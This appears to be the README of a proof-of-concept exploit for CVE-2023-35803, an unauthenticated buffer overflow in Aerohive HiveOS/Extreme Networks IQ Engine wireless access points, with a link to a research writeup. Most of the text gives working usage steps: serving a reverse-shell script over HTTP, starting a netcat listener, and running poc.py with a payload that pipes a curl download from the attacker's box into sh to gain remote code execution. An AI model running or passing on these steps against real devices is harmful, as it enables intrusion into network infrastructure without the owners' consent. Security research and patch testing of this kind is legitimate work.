
PoC exploit for CVE-2023-35803 unauthenticated buffer overflow in Aerohive HiveOS/Extreme Networks IQ Engine, enabling remote code execution on ARM-based wireless access points.
PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.
revshell to point to your shell catcher IP/portpython3 -m http.servernc -lvnp 1337python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/
